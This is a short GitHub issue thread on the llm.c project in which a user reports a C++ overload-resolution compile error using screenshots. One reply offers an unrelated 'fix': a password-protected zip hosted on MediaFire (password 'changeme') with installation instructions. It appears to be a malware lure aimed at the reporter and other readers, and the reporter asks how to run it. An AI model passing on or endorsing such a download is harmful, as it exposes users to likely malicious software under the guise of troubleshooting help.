### ISSUE TITLE
Error no instance of overloaded function "..." matches the argument list

### ISSUE THREAD

**Issue by drzsdrtfg** [karpathy/llm.c#749]
![image](https://github.com/user-attachments/assets/81d3d96a-9a82-49a1-8b8f-c2b072e54b95)
![image](https://github.com/user-attachments/assets/78c7bbc0-8d16-40b2-a67a-d62df9db1e66)
![image](https://github.com/user-attachments/assets/22d0e1fc-0610-4369-a203-7ab865799cc4)
Please ask for more information.

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by drzsdrtfg** [comment]
How do I do this in the command line? @toufiksalhi
